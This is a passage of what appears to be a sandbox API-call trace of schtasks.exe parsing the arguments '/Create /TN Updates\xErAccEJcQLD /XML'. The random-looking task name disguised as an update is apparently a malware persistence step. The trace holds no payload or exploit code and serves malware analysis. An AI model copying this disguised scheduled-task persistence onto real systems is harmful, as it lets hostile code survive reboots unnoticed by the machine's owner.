[0193.563] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x776, lpData=0x4779db8 | out: lpData=0x4779db8) returned 1
[0193.563] VerQueryValueW (in: pBlock=0x4779db8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdcf74, puLen=0xdcf78 | out: lplpBuffer=0xdcf74*=0x477a168, puLen=0xdcf78) returned 1
[0193.563] _memicmp (_Buf1=0x4777438, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.563] _vsnwprintf (in: _Buffer=0x4778ce0, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xdcf58 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0193.563] VerQueryValueW (in: pBlock=0x4779db8, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xdcf84, puLen=0xdcf80 | out: lplpBuffer=0xdcf84*=0x4779f98, puLen=0xdcf80) returned 1
[0193.563] lstrlenW (lpString="schtasks.exe") returned 12
[0193.563] lstrlenW (lpString="schtasks.exe") returned 12
[0193.563] lstrlenW (lpString=".EXE") returned 4
[0193.563] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0193.563] lstrlenW (lpString="schtasks.exe") returned 12
[0193.563] lstrlenW (lpString=".EXE") returned 4
[0193.563] lstrlenW (lpString="schtasks") returned 8
[0193.563] lstrlenW (lpString="/create") returned 7
[0193.563] _memicmp (_Buf1=0x4777438, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.563] _vsnwprintf (in: _Buffer=0x4778ce0, _BufferCount=0x19, _Format="%s %s", _ArgList=0xdcf58 | out: _Buffer="schtasks /create") returned 16
[0193.563] _memicmp (_Buf1=0x4777480, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.563] GetProcessHeap () returned 0x4770000
[0193.563] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47794a8
[0193.563] _memicmp (_Buf1=0x4777468, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.564] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x477a798, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0193.564] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0193.564] GetProcessHeap () returned 0x4770000
[0193.564] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x30) returned 0x47770d0
[0193.564] _vsnwprintf (in: _Buffer=0x47769e0, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xdcf5c | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37
[0193.564] GetProcessHeap () returned 0x4770000
[0193.564] GetProcessHeap () returned 0x4770000
[0193.564] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779db8) returned 1
[0193.564] GetProcessHeap () returned 0x4770000
[0193.564] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779db8) returned 0x776
[0193.564] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779db8) returned 1
[0193.564] RtlRestoreLastWin32Error () returned 0x0
[0193.565] GetThreadLocale () returned 0x409
[0193.565] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.565] lstrlenW (lpString="create") returned 6
[0193.565] GetThreadLocale () returned 0x409
[0193.565] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.565] lstrlenW (lpString="?") returned 1
[0193.565] GetThreadLocale () returned 0x409
[0193.565] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.565] lstrlenW (lpString="s") returned 1
[0193.565] GetThreadLocale () returned 0x409
[0193.565] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.566] lstrlenW (lpString="u") returned 1
[0193.566] GetThreadLocale () returned 0x409
[0193.566] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.566] lstrlenW (lpString="p") returned 1
[0193.566] GetThreadLocale () returned 0x409
[0193.566] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.566] lstrlenW (lpString="ru") returned 2
[0193.566] GetThreadLocale () returned 0x409
[0193.566] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.566] lstrlenW (lpString="rp") returned 2
[0193.566] GetThreadLocale () returned 0x409
[0193.566] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.566] lstrlenW (lpString="sc") returned 2
[0193.566] GetThreadLocale () returned 0x409
[0193.566] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.566] lstrlenW (lpString="mo") returned 2
[0193.566] GetThreadLocale () returned 0x409
[0193.566] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.566] lstrlenW (lpString="d") returned 1
[0193.566] GetThreadLocale () returned 0x409
[0193.566] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.566] lstrlenW (lpString="m") returned 1
[0193.566] GetThreadLocale () returned 0x409
[0193.566] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.566] lstrlenW (lpString="i") returned 1
[0193.566] GetThreadLocale () returned 0x409
[0193.566] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.566] lstrlenW (lpString="tn") returned 2
[0193.566] GetThreadLocale () returned 0x409
[0193.566] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.566] lstrlenW (lpString="tr") returned 2
[0193.566] GetThreadLocale () returned 0x409
[0193.566] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.566] lstrlenW (lpString="st") returned 2
[0193.566] GetThreadLocale () returned 0x409
[0193.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.567] lstrlenW (lpString="sd") returned 2
[0193.567] GetThreadLocale () returned 0x409
[0193.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.567] lstrlenW (lpString="ed") returned 2
[0193.567] GetThreadLocale () returned 0x409
[0193.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.567] lstrlenW (lpString="it") returned 2
[0193.567] GetThreadLocale () returned 0x409
[0193.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.567] lstrlenW (lpString="et") returned 2
[0193.567] GetThreadLocale () returned 0x409
[0193.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.567] lstrlenW (lpString="k") returned 1
[0193.567] GetThreadLocale () returned 0x409
[0193.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.567] lstrlenW (lpString="du") returned 2
[0193.567] GetThreadLocale () returned 0x409
[0193.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.567] lstrlenW (lpString="ri") returned 2
[0193.567] GetThreadLocale () returned 0x409
[0193.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.567] lstrlenW (lpString="z") returned 1
[0193.567] GetThreadLocale () returned 0x409
[0193.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.567] lstrlenW (lpString="f") returned 1
[0193.568] GetThreadLocale () returned 0x409
[0193.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.568] lstrlenW (lpString="v1") returned 2
[0193.568] GetThreadLocale () returned 0x409
[0193.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.568] lstrlenW (lpString="xml") returned 3
[0193.568] GetThreadLocale () returned 0x409
[0193.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.568] lstrlenW (lpString="ec") returned 2
[0193.568] GetThreadLocale () returned 0x409
[0193.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.568] lstrlenW (lpString="rl") returned 2
[0193.568] GetThreadLocale () returned 0x409
[0193.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.568] lstrlenW (lpString="delay") returned 5
[0193.568] GetThreadLocale () returned 0x409
[0193.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.568] lstrlenW (lpString="np") returned 2
[0193.568] GetThreadLocale () returned 0x409
[0193.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.568] lstrlenW (lpString="hresult") returned 7
[0193.568] RtlRestoreLastWin32Error () returned 0x0
[0193.568] RtlRestoreLastWin32Error () returned 0x0
[0193.568] lstrlenW (lpString="/Create") returned 7
[0193.568] lstrlenW (lpString="-/") returned 2
[0193.568] StrChrIW (lpStart="-/", wMatch=0x4a3002f) returned="/"
[0193.569] lstrlenW (lpString="create") returned 6
[0193.569] lstrlenW (lpString="create") returned 6
[0193.569] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.569] lstrlenW (lpString="Create") returned 6
[0193.569] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.569] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8
[0193.569] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|Create|") returned 8
[0193.569] lstrlenW (lpString="|create|") returned 8
[0193.569] lstrlenW (lpString="|Create|") returned 8
[0193.569] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|"
[0193.569] RtlRestoreLastWin32Error () returned 0x0
[0193.569] RtlRestoreLastWin32Error () returned 0x0
[0193.569] RtlRestoreLastWin32Error () returned 0x0
[0193.569] lstrlenW (lpString="/TN") returned 3
[0193.569] lstrlenW (lpString="-/") returned 2
[0193.569] StrChrIW (lpStart="-/", wMatch=0x4a3002f) returned="/"
[0193.569] lstrlenW (lpString="create") returned 6
[0193.569] lstrlenW (lpString="create") returned 6
[0193.569] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.569] lstrlenW (lpString="TN") returned 2
[0193.569] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.569] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8
[0193.569] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.570] lstrlenW (lpString="|create|") returned 8
[0193.570] lstrlenW (lpString="|TN|") returned 4
[0193.570] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0
[0193.570] RtlRestoreLastWin32Error () returned 0x490
[0193.570] lstrlenW (lpString="?") returned 1
[0193.570] lstrlenW (lpString="?") returned 1
[0193.570] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.570] lstrlenW (lpString="TN") returned 2
[0193.570] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.570] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|?|") returned 3
[0193.570] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.570] lstrlenW (lpString="|?|") returned 3
[0193.570] lstrlenW (lpString="|TN|") returned 4
[0193.570] RtlRestoreLastWin32Error () returned 0x490
[0193.570] lstrlenW (lpString="s") returned 1
[0193.570] lstrlenW (lpString="s") returned 1
[0193.570] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.570] lstrlenW (lpString="TN") returned 2
[0193.570] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.570] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|s|") returned 3
[0193.570] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.570] lstrlenW (lpString="|s|") returned 3
[0193.570] lstrlenW (lpString="|TN|") returned 4
[0193.570] RtlRestoreLastWin32Error () returned 0x490
[0193.570] lstrlenW (lpString="u") returned 1
[0193.570] lstrlenW (lpString="u") returned 1
[0193.570] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.570] lstrlenW (lpString="TN") returned 2
[0193.570] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.571] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|u|") returned 3
[0193.571] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.571] lstrlenW (lpString="|u|") returned 3
[0193.571] lstrlenW (lpString="|TN|") returned 4
[0193.571] RtlRestoreLastWin32Error () returned 0x490
[0193.571] lstrlenW (lpString="p") returned 1
[0193.571] lstrlenW (lpString="p") returned 1
[0193.571] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.571] lstrlenW (lpString="TN") returned 2
[0193.571] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.571] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|p|") returned 3
[0193.571] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.571] lstrlenW (lpString="|p|") returned 3
[0193.571] lstrlenW (lpString="|TN|") returned 4
[0193.571] RtlRestoreLastWin32Error () returned 0x490
[0193.571] lstrlenW (lpString="ru") returned 2
[0193.571] lstrlenW (lpString="ru") returned 2
[0193.571] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.571] lstrlenW (lpString="TN") returned 2
[0193.571] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.571] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ru|") returned 4
[0193.571] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.571] lstrlenW (lpString="|ru|") returned 4
[0193.571] lstrlenW (lpString="|TN|") returned 4
[0193.571] StrStrIW (lpFirst="|ru|", lpSrch="|TN|") returned 0x0
[0193.572] RtlRestoreLastWin32Error () returned 0x490
[0193.572] lstrlenW (lpString="rp") returned 2
[0193.572] lstrlenW (lpString="rp") returned 2
[0193.572] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.572] lstrlenW (lpString="TN") returned 2
[0193.572] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.572] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rp|") returned 4
[0193.572] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.572] lstrlenW (lpString="|rp|") returned 4
[0193.572] lstrlenW (lpString="|TN|") returned 4
[0193.572] StrStrIW (lpFirst="|rp|", lpSrch="|TN|") returned 0x0
[0193.572] RtlRestoreLastWin32Error () returned 0x490
[0193.572] lstrlenW (lpString="sc") returned 2
[0193.572] lstrlenW (lpString="sc") returned 2
[0193.572] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.572] lstrlenW (lpString="TN") returned 2
[0193.572] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.572] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4
[0193.572] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.572] lstrlenW (lpString="|sc|") returned 4
[0193.572] lstrlenW (lpString="|TN|") returned 4
[0193.572] StrStrIW (lpFirst="|sc|", lpSrch="|TN|") returned 0x0
[0193.572] RtlRestoreLastWin32Error () returned 0x490
[0193.572] lstrlenW (lpString="mo") returned 2
[0193.572] lstrlenW (lpString="mo") returned 2
[0193.572] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.573] lstrlenW (lpString="TN") returned 2
[0193.573] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.573] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4
[0193.573] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.573] lstrlenW (lpString="|mo|") returned 4
[0193.573] lstrlenW (lpString="|TN|") returned 4
[0193.573] StrStrIW (lpFirst="|mo|", lpSrch="|TN|") returned 0x0
[0193.573] RtlRestoreLastWin32Error () returned 0x490
[0193.573] lstrlenW (lpString="d") returned 1
[0193.573] lstrlenW (lpString="d") returned 1
[0193.573] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.573] lstrlenW (lpString="TN") returned 2
[0193.573] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.573] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|d|") returned 3
[0193.573] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.573] lstrlenW (lpString="|d|") returned 3
[0193.573] lstrlenW (lpString="|TN|") returned 4
[0193.573] RtlRestoreLastWin32Error () returned 0x490
[0193.573] lstrlenW (lpString="m") returned 1
[0193.573] lstrlenW (lpString="m") returned 1
[0193.573] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.573] lstrlenW (lpString="TN") returned 2
[0193.573] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.574] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|m|") returned 3
[0193.574] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.574] lstrlenW (lpString="|m|") returned 3
[0193.574] lstrlenW (lpString="|TN|") returned 4
[0193.574] RtlRestoreLastWin32Error () returned 0x490
[0193.574] lstrlenW (lpString="i") returned 1
[0193.574] lstrlenW (lpString="i") returned 1
[0193.574] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.574] lstrlenW (lpString="TN") returned 2
[0193.574] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.574] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|i|") returned 3
[0193.574] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.574] lstrlenW (lpString="|i|") returned 3
[0193.574] lstrlenW (lpString="|TN|") returned 4
[0193.574] RtlRestoreLastWin32Error () returned 0x490
[0193.574] lstrlenW (lpString="tn") returned 2
[0193.574] lstrlenW (lpString="tn") returned 2
[0193.574] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.574] lstrlenW (lpString="TN") returned 2
[0193.574] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.574] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4
[0193.574] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.574] lstrlenW (lpString="|tn|") returned 4
[0193.574] lstrlenW (lpString="|TN|") returned 4
[0193.574] StrStrIW (lpFirst="|tn|", lpSrch="|TN|") returned="|tn|"
[0193.574] RtlRestoreLastWin32Error () returned 0x0
[0193.574] RtlRestoreLastWin32Error () returned 0x0
[0193.574] lstrlenW (lpString="Updates\\xErAccEJcQLD") returned 20
[0193.575] lstrlenW (lpString="-/") returned 2
[0193.575] StrChrIW (lpStart="-/", wMatch=0x4a30055) returned 0x0
[0193.575] RtlRestoreLastWin32Error () returned 0x490
[0193.575] RtlRestoreLastWin32Error () returned 0x490
[0193.575] RtlRestoreLastWin32Error () returned 0x0
[0193.575] lstrlenW (lpString="Updates\\xErAccEJcQLD") returned 20
[0193.575] StrChrIW (lpStart="Updates\\xErAccEJcQLD", wMatch=0x3a) returned 0x0
[0193.575] RtlRestoreLastWin32Error () returned 0x490
[0193.575] RtlRestoreLastWin32Error () returned 0x0
[0193.575] lstrlenW (lpString="Updates\\xErAccEJcQLD") returned 20
[0193.575] RtlRestoreLastWin32Error () returned 0x0
[0193.575] RtlRestoreLastWin32Error () returned 0x0
[0193.575] lstrlenW (lpString="/XML") returned 4
[0193.575] lstrlenW (lpString="-/") returned 2
[0193.575] StrChrIW (lpStart="-/", wMatch=0x4a3002f) returned="/"
[0193.575] lstrlenW (lpString="create") returned 6
[0193.575] lstrlenW (lpString="create") returned 6
[0193.575] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.575] lstrlenW (lpString="XML") returned 3
[0193.575] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.575] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8
[0193.575] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.575] lstrlenW (lpString="|create|") returned 8
[0193.576] lstrlenW (lpString="|XML|") returned 5
[0193.576] StrStrIW (lpFirst="|create|", lpSrch="|XML|") returned 0x0
[0193.576] RtlRestoreLastWin32Error () returned 0x490
[0193.576] lstrlenW (lpString="?") returned 1
[0193.576] lstrlenW (lpString="?") returned 1
[0193.576] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.576] lstrlenW (lpString="XML") returned 3
[0193.576] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.576] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|?|") returned 3
[0193.576] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.576] lstrlenW (lpString="|?|") returned 3
[0193.576] lstrlenW (lpString="|XML|") returned 5
[0193.576] RtlRestoreLastWin32Error () returned 0x490
[0193.576] lstrlenW (lpString="s") returned 1
[0193.576] lstrlenW (lpString="s") returned 1
[0193.576] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.576] lstrlenW (lpString="XML") returned 3
[0193.576] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.576] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|s|") returned 3
[0193.576] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.576] lstrlenW (lpString="|s|") returned 3
[0193.576] lstrlenW (lpString="|XML|") returned 5
[0193.576] RtlRestoreLastWin32Error () returned 0x490
[0193.576] lstrlenW (lpString="u") returned 1
[0193.576] lstrlenW (lpString="u") returned 1
[0193.576] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.577] lstrlenW (lpString="XML") returned 3
[0193.577] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.577] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|u|") returned 3
[0193.577] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.577] lstrlenW (lpString="|u|") returned 3
[0193.577] lstrlenW (lpString="|XML|") returned 5
[0193.577] RtlRestoreLastWin32Error () returned 0x490
[0193.577] lstrlenW (lpString="p") returned 1
[0193.577] lstrlenW (lpString="p") returned 1
[0193.577] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.577] lstrlenW (lpString="XML") returned 3
[0193.577] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.577] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|p|") returned 3
[0193.577] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.577] lstrlenW (lpString="|p|") returned 3
[0193.577] lstrlenW (lpString="|XML|") returned 5
[0193.577] RtlRestoreLastWin32Error () returned 0x490
[0193.577] lstrlenW (lpString="ru") returned 2
[0193.577] lstrlenW (lpString="ru") returned 2
[0193.577] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.577] lstrlenW (lpString="XML") returned 3
[0193.577] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.577] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ru|") returned 4
